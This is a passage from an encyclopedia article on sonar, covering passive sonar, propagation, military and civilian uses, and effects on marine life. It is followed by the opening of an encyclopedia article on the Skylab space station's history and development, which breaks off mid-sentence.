They may also be used by submarines, AUVs, and floats such as the Argo float. Passive sonar Passive sonar listens without transmitting. It is often employed in military settings, although it is also used in science applications, e.g., detecting fish for presence/absence studies in various aquatic environments – see also passive acoustics and passive radar. In the very broadest usage, this term can encompass virtually any analytical technique involving remotely generated sound, though it is usually restricted to techniques applied in an aquatic environment. Identifying sound sources Passive sonar has a wide variety of techniques for identifying the source of a detected sound. For example, U.S. vessels usually operate 60 Hertz (Hz) alternating current power systems. If transformers or generators are mounted without proper vibration insulation from the hull or become flooded, the 60 Hz sound from the windings can be emitted from the submarine or ship. This can help to identify its nationality, as all European submarines and nearly every other nation's submarine have 50 Hz power systems. Intermittent sound sources (such as a wrench being dropped), called "transients," may also be detectable to passive sonar. Until fairly recently, an experienced, trained operator identified signals, but now computers may do this. Passive sonar systems may have large sonic databases, but the sonar operator usually finally classifies the signals manually. A computer system frequently uses these databases to identify classes of ships, actions (i.e. the speed of a ship, or the type of weapon released and the most effective countermeasures to employ), and even particular ships. Noise limitations Passive sonar on vehicles is usually severely limited because of noise generated by the vehicle. For this reason, many submarines operate nuclear reactors that can be cooled without pumps, using silent convection, or fuel cells or batteries, which can also run silently. Vehicles' propellers are also designed and precisely machined to emit minimal noise. High-speed propellers often create tiny bubbles in the water, and this cavitation has a distinct sound. The sonar hydrophones may be towed behind the ship or submarine in order to reduce the effect of noise generated by the watercraft itself. Towed units also combat the thermocline, as the unit may be towed above or below the thermocline. The display of most passive sonars used to be a two-dimensional waterfall display. The horizontal direction of the display is bearing. The vertical is frequency, or sometimes time. Another display technique is to color-code frequency-time information for bearing. More recent displays are generated by the computers, and mimic radar-type plan position indicator displays. Performance prediction Unlike active sonar, only one-way propagation is involved. Because of the different signal processing used, the minimal detectable signal-to-noise ratio will be different. The equation for determining the performance of a passive sonar is SL − PL = NL − AG + DT, where SL is the source level, PL is the propagation loss, NL is the noise level, AG is the array gain and DT is the detection threshold. The figure of merit of a passive sonar is FOM = SL + AG − (NL + DT). Performance factors The detection, classification and localisation performance of a sonar depends on the environment and the receiving equipment, as well as the transmitting equipment in an active sonar or the target radiated noise in a passive sonar. Sound propagation Sonar operation is affected by variations in sound speed, particularly in the vertical plane. Sound travels more slowly in fresh water than in sea water, though the difference is small. The speed is determined by the water's bulk modulus and mass density. The bulk modulus is affected by temperature, dissolved impurities (usually salinity), and pressure. The density effect is small. The speed of sound (in feet per second) is approximately: 4388 + (11.25 × temperature (in °F)) + (0.0182 × depth (in feet)) + salinity (in parts-per-thousand ). This empirically derived approximation equation is reasonably accurate for normal temperatures, concentrations of salinity and the range of most ocean depths. Ocean temperature varies with depth, but at between 30 and 100 meters there is often a marked change, called the thermocline, dividing the warmer surface water from the cold, still waters that make up the rest of the ocean. This can frustrate sonar, because a sound originating on one side of the thermocline tends to be bent, or refracted, through the thermocline. The thermocline may be present in shallower coastal waters. However, wave action will often mix the water column and eliminate the thermocline. Water pressure also affects sound propagation: higher pressure increases the sound speed, which causes the sound waves to refract away from the area of higher sound speed. The mathematical model of refraction is called Snell's law. If the sound source is deep and the conditions are right, propagation may occur in the 'deep sound channel'. This provides extremely low propagation loss to a receiver in the channel. This is because of sound trapping in the channel with no losses at the boundaries. Similar propagation can occur in the 'surface duct' under suitable conditions. However, in this case there are reflection losses at the surface. In shallow water propagation is generally by repeated reflection at the surface and bottom, where considerable losses can occur. Sound propagation is affected by absorption in the water itself as well as at the surface and bottom. This absorption depends upon frequency, with several different mechanisms in sea water. Long-range sonar uses low frequencies to minimise absorption effects. The sea contains many sources of noise that interfere with the desired target echo or signature. The main noise sources are waves and shipping. The motion of the receiver through the water can also cause speed-dependent low frequency noise. Scattering When active sonar is used, scattering occurs from small objects in the sea as well as from the bottom and surface. This can be a major source of interference. This acoustic scattering is analogous to the scattering of the light from a car's headlights in fog: a high-intensity pencil beam will penetrate the fog to some extent, but broader-beam headlights emit much light in unwanted directions, much of which is scattered back to the observer, overwhelming that reflected from the target ("white-out"). For analogous reasons active sonar needs to transmit in a narrow beam to minimize scattering. The scattering of sonar from objects (mines, pipelines, zooplankton, geological features, fish etc.) is how active sonar detects them, but this ability can be masked by strong scattering from false targets, or 'clutter'. Where they occur (under breaking waves; in ship wakes; in gas emitted from seabed seeps and leaks etc.), gas bubbles are powerful sources of clutter, and can readily hide targets. TWIPS (Twin Inverted Pulse Sonar) is currently the only sonar that can overcome this clutter problem. This is important as many recent conflicts have occurred in coastal waters, and the inability to detect whether mines are present or not present hazards and delays to military vessels, and also to aid convoys and merchant shipping trying to support the region long after the conflict has ceased. Target characteristics The sound reflection characteristics of the target of an active sonar, such as a submarine, are known as its target strength. A complication is that echoes are also obtained from other objects in the sea such as whales, wakes, schools of fish and rocks. Passive sonar detects the target's radiated noise characteristics. The radiated spectrum comprises a continuous spectrum of noise with peaks at certain frequencies which can be used for classification. Countermeasures Active (powered) countermeasures may be launched by a vessel under attack to raise the noise level, provide a large false target, and obscure the signature of the vessel itself. Passive (i.e., non-powered) countermeasures include: Mounting noise-generating devices on isolating devices. Sound-absorbent coatings on the hulls of submarines, for example anechoic tiles. Military applications Modern naval warfare makes extensive use of both passive and active sonar from water-borne vessels, aircraft and fixed installations. Although active sonar was used by surface craft in World War II, submarines avoided the use of active sonar due to the potential for revealing their presence and position to enemy forces. However, the advent of modern signal-processing enabled the use of passive sonar as a primary means for search and detection operations. In 1987 a division of Japanese company Toshiba reportedly sold machinery to the Soviet Union that allowed their submarine propeller blades to be milled so that they became radically quieter, making the newer generation of submarines more difficult to detect. The use of active sonar by a submarine to determine bearing is extremely rare and will not necessarily give high quality bearing or range information to the submarines fire control team. However, use of active sonar on surface ships is very common and is used by submarines when the tactical situation dictates that it is more important to determine the position of a hostile submarine than conceal their own position. With surface ships, it might be assumed that the threat is already tracking the ship with satellite data as any vessel around the emitting sonar will detect the emission. Having heard the signal, it is easy to identify the sonar equipment used (usually with its frequency) and its position (with the sound wave's energy). Active sonar is similar to radar in that, while it allows detection of targets at a certain range, it also enables the emitter to be detected at a far greater range, which is undesirable. Since active sonar reveals the presence and position of the operator, and does not allow exact classification of targets, it is used by fast (planes, helicopters) and by noisy platforms (most surface ships) but rarely by submarines. When active sonar is used by surface ships or submarines, it is typically activated very briefly at intermittent periods to minimize the risk of detection. Consequently, active sonar is normally considered a backup to passive sonar. In aircraft, active sonar is used in the form of disposable sonobuoys that are dropped in the aircraft's patrol area or in the vicinity of possible enemy sonar contacts. Passive sonar has several advantages, most importantly that it is silent. If the target radiated noise level is high enough, it can have a greater range than active sonar, and allows the target to be identified. Since any motorized object makes some noise, it may in principle be detected, depending on the level of noise emitted and the ambient noise level in the area, as well as the technology used. To simplify, passive sonar "sees" around the ship using it. On a submarine, nose-mounted passive sonar detects in directions of about 270°, centered on the ship's alignment, the hull-mounted array of about 160° on each side, and the towed array of a full 360°. The invisible areas are due to the ship's own interference. Once a signal is detected in a certain direction (which means that something makes sound in that direction, this is called broadband detection) it is possible to zoom in and analyze the signal received (narrowband analysis). This is generally done using a Fourier transform to show the different frequencies making up the sound. Since every engine makes a specific sound, it is straightforward to identify the object. Databases of unique engine sounds are part of what is known as acoustic intelligence or ACINT. Another use of passive sonar is to determine the target's trajectory. This process is called target motion analysis (TMA), and the resultant "solution" is the target's range, course, and speed. TMA is done by marking from which direction the sound comes at different times, and comparing the motion with that of the operator's own ship. Changes in relative motion are analyzed using standard geometrical techniques along with some assumptions about limiting cases. Passive sonar is stealthy and very useful. However, it requires high-tech electronic components and is costly. It is generally deployed on expensive ships in the form of arrays to enhance detection. Surface ships use it to good effect; it is even better used by submarines, and it is also used by airplanes and helicopters, mostly to a "surprise effect", since submarines can hide under thermal layers. If a submarine's commander believes he is alone, he may bring his boat closer to the surface and be easier to detect, or go deeper and faster, and thus make more sound. Examples of sonar applications in military use are given below. Many of the civil uses given in the following section may also be applicable to naval use. Anti-submarine warfare Until recently, ship sonars were usually made with hull mounted arrays, either amidships or at the bow. It was soon found after their initial use that a means of reducing flow noise was required. The first were made of canvas on a framework, then steel ones were used. Now domes are usually made of reinforced plastic or pressurized rubber. Such sonars are primarily active in operation. An example of a conventional hull mounted sonar is the SQS-56. Because of the problems of ship noise, towed sonars are also used. These have the advantage of being able to be placed deeper in the water, but have limitations on their use in shallow water. These are called towed arrays (linear) or variable depth sonars (VDS) with 2/3D arrays. A problem is that the winches required to deploy/recover them are large and expensive. VDS sets are primarily active in operation, while towed arrays are passive. An example of a modern active-passive ship towed sonar is Sonar 2087 made by Thales Underwater Systems. Torpedoes Modern torpedoes are generally fitted with an active/passive sonar. This may be used to home directly on the target, but wake homing torpedoes are also used. An early example of an acoustic homer was the Mark 37 torpedo. Torpedo countermeasures can be towed or free. An early example was the German Sieglinde device while the Bold was a chemical device. A widely used US device was the towed AN/SLQ-25 Nixie while the mobile submarine simulator (MOSS) was a free device. A modern alternative to the Nixie system is the UK Royal Navy S2170 Surface Ship Torpedo Defence system. Mines Mines may be fitted with a sonar to detect, localize and recognize the required target. An example is the CAPTOR mine. Mine countermeasures Mine countermeasure (MCM) sonar, sometimes called "mine and obstacle avoidance sonar (MOAS)", is a specialized type of sonar used for detecting small objects. Most MCM sonars are hull mounted but a few types are VDS design. An example of a hull mounted MCM sonar is the Type 2193 while the SQQ-32 mine-hunting sonar and Type 2093 systems are VDS designs. Submarine navigation Submarines rely on sonar to a greater extent than surface ships as they cannot use radar in water. The sonar arrays may be hull mounted or towed. Information fitted on typical fits is given in and . Aircraft Helicopters can be used for antisubmarine warfare by deploying fields of active-passive sonobuoys or can operate dipping sonar, such as the AQS-13. Fixed wing aircraft can also deploy sonobuoys and have greater endurance and capacity to deploy them. Processing from the sonobuoys or dipping sonar can be on the aircraft or on ship. Dipping sonar has the advantage of being deployable to depths appropriate to daily conditions. Helicopters have also been used for mine countermeasure missions using towed sonars such as the AQS-20A. Underwater communications Dedicated sonars can be fitted to ships and submarines for underwater communication. Ocean surveillance The United States began a system of passive, fixed ocean surveillance systems in 1950 with the classified name Sound Surveillance System (SOSUS) with American Telephone and Telegraph Company (AT&T), with its Bell Laboratories research and Western Electric manufacturing entities being contracted for development and installation. The systems exploited the SOFAR channel, also known as the deep sound channel, where a sound speed minimum creates a waveguide in which low frequency sound travels thousands of miles. Analysis was based on an AT&T sound spectrograph, which converted sound into a visual spectrogram representing a time–frequency analysis of sound that was developed for speech analysis and modified to analyze low-frequency underwater sounds. That process was Low Frequency Analysis and Recording and the equipment was termed the Low Frequency Analyzer and Recorder, both with the acronym LOFAR. LOFAR research was termed Jezebel and led to usage in air and surface systems, particularly sonobuoys using the process and sometimes using "Jezebel" in their name. The proposed system offered such promise of long-range submarine detection that the Navy ordered immediate moves for implementation. Between installation of a test array followed by a full scale, forty element, prototype operational array in 1951 and 1958 systems were installed in the Atlantic and then the Pacific under the unclassified name Project Caesar. The original systems were terminated at classified shore stations designated Naval Facility (NAVFAC) explained as engaging in "ocean research" to cover their classified mission. The system was upgraded multiple times with more advanced cable allowing the arrays to be installed in ocean basins and upgraded processing. The shore stations were eliminated in a process of consolidation and rerouting the arrays to central processing centers into the 1990s. In 1985, with new mobile arrays and other systems becoming operational the collective system name was changed to Integrated Undersea Surveillance System (IUSS). In 1991 the mission of the system was declassified. The year before IUSS insignia were authorized for wear. Access was granted to some systems for scientific research. A similar system is believed to have been operated by the Soviet Union. Underwater security Sonar can be used to detect frogmen and other scuba divers. This can be applicable around ships or at entrances to ports. Active sonar can also be used as a deterrent and/or disablement mechanism. One such device is the Cerberus system. Hand-held sonar Limpet mine imaging sonar (LIMIS) is a hand-held or ROV-mounted imaging sonar designed for patrol divers (combat frogmen or clearance divers) to look for limpet mines in low visibility water. The LUIS is another imaging sonar for use by a diver. Integrated navigation sonar system (INSS) is a small flashlight-shaped handheld sonar for divers that displays range. Intercept sonar This is a sonar designed to detect and locate the transmissions from hostile active sonars. An example of this is the Type 2082 fitted on the British s. Civilian applications Fisheries Fishing is an important industry that is seeing growing demand, but world catch tonnage is falling as a result of serious resource problems. The industry faces a future of continuing worldwide consolidation until a point of sustainability can be reached. However, the consolidation of the fishing fleets are driving increased demands for sophisticated fish finding electronics such as sensors, sounders and sonars. Historically, fishermen have used many different techniques to find and harvest fish. However, acoustic technology has been one of the most important driving forces behind the development of the modern commercial fisheries. Sound waves travel differently through fish than through water because a fish's air-filled swim bladder has a different density than seawater. This density difference allows the detection of schools of fish by using reflected sound. Acoustic technology is especially well suited for underwater applications since sound travels farther and faster underwater than in air. Today, commercial fishing vessels rely almost completely on acoustic sonar and sounders to detect fish. Fishermen also use active sonar and echo sounder technology to determine water depth, bottom contour, and bottom composition. Companies such as eSonar, Raymarine, Marport Canada, Wesmar, Furuno, Krupp, and Simrad make a variety of sonar and acoustic instruments for the deep sea commercial fishing industry. For example, net sensors take various underwater measurements and transmit the information back to a receiver on board a vessel. Each sensor is equipped with one or more acoustic transducers depending on its specific function. Data is transmitted from the sensors using wireless acoustic telemetry and is received by a hull mounted hydrophone. The analog signals are decoded and converted by a digital acoustic receiver into data which is transmitted to a bridge computer for graphical display on a high resolution monitor. Echo sounding Echo sounding is a process used to determine the depth of water beneath ships and boats. A type of active sonar, echo sounding is the transmission of an acoustic pulse directly downwards to the seabed, measuring the time between transmission and echo return, after having hit the bottom and bouncing back to its ship of origin. The acoustic pulse is emitted by a transducer which receives the return echo as well. The depth measurement is calculated by multiplying the speed of sound in water (averaging 1,500 meters per second) by the time between emission and echo return. The value of underwater acoustics to the fishing industry has led to the development of other acoustic instruments that operate in a similar fashion to echo-sounders but, because their function is slightly different from the initial model of the echo-sounder, have been given different terms. Net location The net sounder is an echo sounder with a transducer mounted on the headline of the net rather than on the bottom of the vessel. Nevertheless, to accommodate the distance from the transducer to the display unit, which is much greater than in a normal echo-sounder, several refinements have to be made. Two main types are available. The first is the cable type in which the signals are sent along a cable. In this case, there has to be the provision of a cable drum on which to haul, shoot and stow the cable during the different phases of the operation. The second type is the cable-less net-sounder – such as Marport's Trawl Explorer – in which the signals are sent acoustically between the net and hull mounted receiver-hydrophone on the vessel. In this case, no cable drum is required but sophisticated electronics are needed at the transducer and receiver. The display on a net sounder shows the distance of the net from the bottom (or the surface), rather than the depth of water as with the echo-sounder's hull-mounted transducer. Fixed to the headline of the net, the footrope can usually be seen which gives an indication of the net performance. Any fish passing into the net can also be seen, allowing fine adjustments to be made to catch the most fish possible. In other fisheries, where the amount of fish in the net is important, catch sensor transducers are mounted at various positions on the cod-end of the net. As the cod-end fills up these catch sensor transducers are triggered one by one and this information is transmitted acoustically to display monitors on the bridge of the vessel. The skipper can then decide when to haul the net. Modern versions of the net sounder, using multiple element transducers, function more like a sonar than an echo sounder and show slices of the area in front of the net and not merely the vertical view that the initial net sounders used. The sonar is an echo-sounder with a directional capability that can show fish or other objects around the vessel. ROV and UUV Small sonars have been fitted to remotely operated vehicles (ROVs) and unmanned underwater vehicles (UUVs) to allow their operation in murky conditions. These sonars are used for looking ahead of the vehicle. The Long-Term Mine Reconnaissance System is a UUV for MCM purposes. Vehicle location Sonars which act as beacons are fitted to aircraft to allow their location in the event of a crash in the sea. Short and long baseline sonars may be used for caring out the location, such as LBL. Prosthesis for the visually impaired In 2013 an inventor in the United States unveiled a "spider-sense" bodysuit, equipped with ultrasonic sensors and haptic feedback systems, which alerts the wearer of incoming threats; allowing them to respond to attackers even when blindfolded. Scientific applications Biomass estimation Detection of fish, and other marine and aquatic life, and estimation their individual sizes or total biomass using active sonar techniques. Sound pulses reflect off any object that has a different density than the surrounding medium. This includes fish, or more specifically, the air-filled swim bladder on fish. These echoes provide information on fish size, location, abundance and behavior. This is especially effective for fish swim bladders (e.g. herring, cod, and pollock), and less useful for fish without them (e.g. sharks, mackerel, and flounder). Data from the watercolumn is usually processed differently than seafloor or object detection data, this data type can be processed with specialized software. Wave measurement An upward looking echo sounder mounted on the bottom or on a platform may be used to make measurements of wave height and period. From this statistics of the surface conditions at a location can be derived. Water velocity measurement Special short range sonars have been developed to allow measurements of water velocity. Bottom type assessment Sonars have been developed that can be used to characterise the sea bottom into, for example, mud, sand, and gravel. Relatively simple sonars such as echo sounders can be promoted to seafloor classification systems via add-on modules, converting echo parameters into sediment type. Different algorithms exist, but they are all based on changes in the energy or shape of the reflected sounder pings. Advanced substrate classification analysis can be achieved using calibrated (scientific) echosounders and parametric or fuzzy-logic analysis of the acoustic data. Bathymetric mapping Side-scan sonars can be used to derive maps of seafloor topography (bathymetry) by moving the sonar across it just above the bottom. Low frequency sonars such as GLORIA have been used for continental shelf wide surveys while high frequency sonars are used for more detailed surveys of smaller areas. Hull-mounted multibeam echosounders on large surface vessels produce swathes of bathymetric data in near real time. One example, the General Instrument "Seabeam" system, uses a projector array along the keel to ensonify the bottom with a fan beam. Signals from a hydrophone array mounted athwartships are processed to synthesize multiple virtual fan beams crossing the projector beam at right angles. Sonar imaging Creating two and three-dimensional images using sonar data. Sub-bottom profiling Powerful low frequency echo-sounders have been developed for providing profiles of the upper layers of the ocean bottom. One of the most recent devices is Innomar's SES-2000 quattro multi-transducer parametric SBP, used for example in the Puck Bay for underwater archaeological purposes. Gas leak detection from the seabed Gas bubbles can leak from the seabed, or close to it, from multiple sources. These can be detected by both passive and active sonar (shown in schematic figure by yellow and red systems respectively). Natural seeps of methane and carbon dioxide occur. Gas pipelines can leak, and it is important to be able to detect whether leakage occurs from Carbon Capture and Storage Facilities (CCSFs; e.g. depleted oil wells into which extracted atmospheric carbon is stored). Quantification of the amount of gas leaking is difficult, and although estimates can be made use active and passive sonar, it is important to question their accuracy because of the assumptions inherent in making such estimations from sonar data. Synthetic aperture sonar Various synthetic aperture sonars have been built in the laboratory and some have entered use in mine-hunting and search systems. An explanation of their operation is given in synthetic aperture sonar. Parametric sonar Parametric sources use the non-linearity of water to generate the difference frequency between two high frequencies. A virtual end-fire array is formed. Such a projector has advantages of broad bandwidth, narrow beamwidth, and when fully developed and carefully measured it has no obvious sidelobes: see Parametric array. Its major disadvantage is very low efficiency of only a few percent. P.J. Westervelt summarizes the trends involved. Sonar in extraterrestrial contexts The use of both active and passive sonar has been proposed for various extraterrestrial environments. One example is Titan, where active sonar could be used to determine the depth of its hydrocarbon seas, and passive sonar could be used to detect methanefalls. Proposals that do not take proper account of the difference between terrestrial and extraterrestrial environments could lead to erroneous measurements. Ecological impact Effect on marine mammals Research has shown that use of active sonar can lead to mass strandings of marine mammals. Beaked whales, the most common casualty of the strandings, have been shown to be highly sensitive to mid-frequency active sonar. Other marine mammals such as the blue whale also flee from the source of the sonar, while naval activity was suggested to be the most probable cause of a mass stranding of dolphins. The US Navy, which part-funded some of the studies, said that the findings only showed behavioural responses to sonar, not actual harm, but they "will evaluate the effectiveness of [their] marine mammal protective measures in light of new research findings". A 2008 US Supreme Court ruling on the use of sonar by the US Navy noted that there had been no cases where sonar had been conclusively shown to have harmed or killed a marine mammal. Some marine animals, such as whales and dolphins, use echolocation systems, sometimes called biosonar to locate predators and prey. Research on the effects of sonar on blue whales in the Southern California Bight shows that mid-frequency sonar use disrupts the whales' feeding behavior. This indicates that sonar-induced disruption of feeding and displacement from high-quality prey patches could have significant and previously undocumented impacts on baleen whale foraging ecology, individual fitness and population health. A review of evidence on the mass strandings of beaked whale linked to naval exercises where sonar was used was published in 2019. It concluded that the effects of mid-frequency active sonar are strongest on Cuvier's beaked whales but vary among individuals or populations. The review suggested the strength of response of individual animals may depend on whether they had prior exposure to sonar, and that symptoms of decompression sickness have been found in stranded whales that may be a result of such response to sonar. It noted that in the Canary Islands where multiple strandings had been previously reported, no more mass strandings had occurred once naval exercises during which sonar was used were banned in the area, and recommended that the ban be extended to other areas where mass strandings continue to occur. Effect on fish Low frequency sonar can create a small temporary shift in the hearing threshold of some fish. Frequencies and resolutions The frequencies of sonars range from infrasonic to above a megahertz. Generally, the lower frequencies have longer range, while the higher frequencies offer better resolution, and smaller size for a given directionality. To achieve reasonable directionality, frequencies below 1 kHz generally require large size, usually achieved as towed arrays. Low frequency sonars are loosely defined as 1–5 kHz, albeit some navies regard 5–7 kHz also as low frequency. Medium frequency is defined as 5–15 kHz. Another style of division considers low frequency to be under 1 kHz, and medium frequency at between 1–10 kHz. American World War II era sonars operated at a relatively high frequency of 20–30 kHz, to achieve directionality with reasonably small transducers, with typical maximum operational range of 2500 yd. Postwar sonars used lower frequencies to achieve longer range; e.g. SQS-4 operated at 10 kHz with range up to 5000 yd. SQS-26 and SQS-53 operated at 3 kHz with range up to 20,000 yd; their domes had size of approx. a 60-ft personnel boat, an upper size limit for conventional hull sonars. Achieving larger sizes by conformal sonar array spread over the hull has not been effective so far, for lower frequencies linear or towed arrays are therefore used. Japanese WW2 sonars operated at a range of frequencies. The Type 91, with 30 inch quartz projector, worked at 9 kHz. The Type 93, with smaller quartz projectors, operated at 17.5 kHz (model 5 at 16 or 19 kHz magnetostrictive) at powers between 1.7 and 2.5 kilowatts, with range of up to 6 km. The later Type 3, with German-design magnetostrictive transducers, operated at 13, 14.5, 16, or 20 kHz (by model), using twin transducers (except model 1 which had three single ones), at 0.2 to 2.5 kilowatts. The simple type used 14.5 kHz magnetostrictive transducers at 0.25 kW, driven by capacitive discharge instead of oscillators, with range up to 2.5 km. The sonar's resolution is angular; objects further apart are imaged with lower resolutions than nearby ones. Another source lists ranges and resolutions vs frequencies for sidescan sonars. 30 kHz provides low resolution with range of 1000–6000 m, 100 kHz gives medium resolution at 500–1000 m, 300 kHz gives high resolution at 150–500 m, and 600 kHz gives high resolution at 75–150 m. Longer range sonars are more adversely affected by nonhomogenities of water. Some environments, typically shallow waters near the coasts, have complicated terrain with many features; higher frequencies become necessary there.
Technology
Navigation
null
29441
https://en.wikipedia.org/wiki/Skylab
Skylab
Skylab was the United States' first space station, launched by NASA, occupied for about 24 weeks between May 1973 and February 1974. It was operated by three trios of astronaut crews: Skylab 2, Skylab 3, and Skylab 4. Operations included an orbital workshop, a solar observatory, Earth observation and hundreds of experiments. Skylab's orbit eventually decayed and it disintegrated in the atmosphere on July 11, 1979, scattering debris across the Indian Ocean and Western Australia. Overview Skylab was the only space station operated exclusively by the United States. A permanent station was planned starting in 1988, but its funding was canceled and U.S. participation shifted to the International Space Station in 1993. Skylab had a mass of with a Apollo command and service module (CSM) attached and included a workshop, a solar observatory, and several hundred life science and physical science experiments. It was launched uncrewed into low Earth orbit by a Saturn V rocket modified to be similar to the Saturn INT-21, with the S-IVB third stage not available for propulsion because the orbital workshop was built out of it. This was the final flight for the rocket more commonly known for carrying the crewed Apollo Moon landing missions. Three subsequent missions delivered three-astronaut crews in the Apollo CSM launched by the smaller Saturn IB rocket. Configuration Skylab included the Apollo Telescope Mount (a multi-spectral solar observatory), a multiple docking adapter with two docking ports, an airlock module with extravehicular activity (EVA) hatches, and the orbital workshop, the main habitable space inside Skylab. Electrical power came from solar arrays and fuel cells in the docked Apollo CSM. The rear of the station included a large waste tank, propellant tanks for maneuvering jets, and a heat radiator. Astronauts conducted numerous experiments aboard Skylab during its operational life. Operations For the final two crewed missions to Skylab, NASA assembled a backup Apollo CSM/Saturn IB in case an in-orbit rescue mission was needed, but this vehicle was never flown. The station was damaged during launch when the micrometeoroid shield tore away from the workshop, taking one of the main solar panel arrays with it and jamming the other main array. This deprived Skylab of most of its electrical power and also removed protection from intense solar heating, threatening to make it unusable. The first crew deployed a replacement heat shade and freed the jammed solar panels to save Skylab. This was the first time that a repair of this magnitude was performed in space. The Apollo Telescope significantly advanced solar science, and observation of the Sun was unprecedented. Astronauts took thousands of photographs of Earth, and the Earth Resources Experiment Package (EREP) viewed Earth with sensors that recorded data in the visible, infrared, and microwave spectral regions. The record for human time spent in orbit was extended beyond the 23 days set by the Soyuz 11 crew aboard Salyut 1 to 84 days by the Skylab 4 crew. Later plans to reuse Skylab were stymied by delays in the development of the Space Shuttle, and Skylab's decaying orbit could not be stopped. Skylab's atmospheric reentry began on July 11, 1979, amid worldwide media attention. Before re-entry, NASA ground controllers tried to adjust Skylab's orbit to minimize the risk of debris landing in populated areas, targeting the south Indian Ocean, which was partially successful. Debris showered Western Australia, and recovered pieces indicated that the station had disintegrated lower than expected. As the Skylab program drew to a close, NASA's focus had shifted to the development of the Space Shuttle. NASA space station and laboratory projects included Spacelab, Shuttle-Mir, and Space Station Freedom, which was merged into the International Space Station. Background Rocket engineer Wernher von Braun, science fiction writer Arthur C. Clarke, and other early advocates of crewed space travel, expected until the 1960s that a space station would be an important early step in space exploration. Von Braun participated in the publishing of a series of influential articles in Collier's magazine from 1952 to 1954, titled "Man Will Conquer Space Soon!". He envisioned a large, circular station in diameter that would rotate to generate artificial gravity and require a fleet of space shuttles for construction in orbit. The 80 men aboard the station would include astronomers operating a telescope, meteorologists to forecast the weather, and soldiers to conduct surveillance. Von Braun expected that future expeditions to the Moon and Mars would leave from the station. The development of the transistor, the solar cell, and telemetry, led in the 1950s and early 1960s to uncrewed satellites that could take photographs of weather patterns or enemy nuclear weapons and send them to Earth. A large station was no longer necessary for such purposes, and the United States Apollo program to send men to the Moon chose a mission mode that would not need in-orbit assembly. A smaller station that a single rocket could launch retained value, however, for scientific purposes. Early studies In 1959, von Braun, head of the Development Operations Division at the Army Ballistic Missile Agency, submitted his final Project Horizon plans to the U.S. Army. The overall goal of Horizon was to place men on the Moon, a mission that would soon be taken over by the rapidly forming NASA. Although concentrating on the Moon missions, von Braun also detailed an orbiting laboratory built out of a Horizon upper stage, an idea used for Skylab. A number of NASA centers studied various space station designs in the early 1960s. Studies generally looked at platforms launched by the Saturn V, followed up by crews launched on Saturn IB using an Apollo command and service module, or a Gemini capsule on a Titan II-C, the latter being much less expensive in the case where cargo was not needed. Proposals ranged from an Apollo-based station with two to three men, or a small "canister" for four men with Gemini capsules resupplying it, to a large, rotating station with 24 men and an operating lifetime of about five years. A proposal to study the use of a Saturn S-IVB as a crewed space laboratory was documented in 1962 by the Douglas Aircraft Company. Air Force plans The Department of Defense (DoD) and NASA cooperated closely in many areas of space. In September 1963, NASA and the DoD agreed to cooperate in building a space station. The DoD wanted its own crewed facility, however, and in December 1963 it announced Manned Orbital Laboratory (MOL), a small space station primarily intended for photo reconnaissance using large telescopes directed by a two-person crew. The station was the same diameter as a Titan II upper stage, and would be launched with the crew riding atop in a modified Gemini capsule with a hatch cut into the heat shield on the bottom of the capsule. MOL competed for funding with a NASA station for the next five years and politicians and other officials often suggested that NASA participate in MOL or use the DoD design. The military project led to changes to the NASA plans so that they would resemble MOL less. Development Apollo Applications Program NASA management was concerned about losing the 400,000 workers involved in Apollo after landing on the Moon in 1969. A reason von Braun, head of NASA's Marshall Space Flight Center during the 1960s, advocated a smaller station after his large one was not built was that he wished to provide his employees with work beyond developing the Saturn rockets, which would be completed relatively early during Project Apollo. NASA set up the Apollo Logistic Support System Office, originally intended to study various ways to modify the Apollo hardware for scientific missions. The office initially proposed a number of projects for direct scientific study, including an extended-stay lunar mission which required two Saturn V launchers, a "lunar truck" based on the Lunar Module (LM), a large, crewed solar telescope using an LM as its crew quarters, and small space stations using a variety of LM or CSM-based hardware. Although it did not look at the space station specifically, over the next two years the office would become increasingly dedicated to this role. In August 1965, the office was renamed, becoming the Apollo Applications Program (AAP). As part of their general work, in August 1964 the Manned Spacecraft Center (MSC) presented studies on an expendable lab known as Apollo X, short for Apollo Extension System. Apollo X would have replaced the LM carried on the top of the S-IVB stage with a small space station slightly larger than the CSM's service area, containing supplies and experiments for missions between 15 and 45 days' duration. Using this study as a baseline, a number of different mission profiles were looked at over the next six months. Wet workshop In November 1964, von Braun proposed a more ambitious plan to build a much larger station built from the S-II second stage of a Saturn V. His design replaced the S-IVB third stage with an aeroshell, primarily as an adapter for the CSM on top. Inside the shell was a cylindrical equipment section. On reaching orbit, the S-II second stage would be vented to remove any remaining hydrogen fuel, then the equipment section would be slid into it via a large inspection hatch. This became known as a "wet workshop" concept, because of the conversion of an active fuel tank. The station filled the entire interior of the S-II stage's hydrogen tank, with the equipment section forming a "spine" and living quarters located between it and the walls of the booster. This would have resulted in a very large living area. Power was to be provided by solar cells lining the outside of the S-II stage. One problem with this proposal was that it required a dedicated Saturn V launch to fly the station. At the time the design was being proposed, it was not known how many of the then-contracted Saturn Vs would be required to achieve a successful Moon landing. However, several planned Earth-orbit test missions for the LM and CSM had been canceled, leaving a number of Saturn IBs free for use. Further work led to the idea of building a smaller "wet workshop" based on the S-IVB, launched as the second stage of a Saturn IB. A number of S-IVB-based stations were studied at MSC from mid-1965, which had much in common with the Skylab design that eventually flew. An airlock would be attached to the hydrogen tank, in the area designed to hold the LM, and a minimum amount of equipment would be installed in the tank itself in order to avoid taking up too much fuel volume. Floors of the station would be made from an open metal framework that allowed the fuel to flow through it. After launch, a follow-up mission launched by a Saturn IB would launch additional equipment, including solar panels, an equipment section and docking adapter, and various experiments. Douglas Aircraft Company, builder of the S-IVB stage, was asked to prepare proposals along these lines. The company had for several years been proposing stations based on the S-IV stage, before it was replaced by the S-IVB. On April 1, 1966, MSC sent out contracts to Douglas, Grumman, and McDonnell for the conversion of an S-IVB spent stage, under the name Saturn S-IVB spent-stage experiment support module (SSESM). In May 1966, astronauts voiced concerns over the purging of the stage's hydrogen tank in space. Nevertheless, in late July 1966, it was announced that the Orbital Workshop would be launched as a part of Apollo mission AS-209, originally one of the Earth-orbit CSM test launches, followed by two Saturn I/CSM crew launches, AAP-1 and AAP-2. The Manned Orbiting Laboratory (MOL) remained AAP's chief competitor for funds, although the two programs cooperated on technology. NASA considered flying experiments on MOL or using its Titan IIIC booster instead of the much more expensive Saturn IB. The agency decided that the Air Force station was not large enough and that converting Apollo hardware for use with Titan would be too slow and too expensive. The DoD later canceled MOL in June 1969. Dry workshop Design work continued over the next two years, in an era of shrinking budgets. (NASA sought US$450 million for Apollo Applications in fiscal year 1967, for example, but received US$42 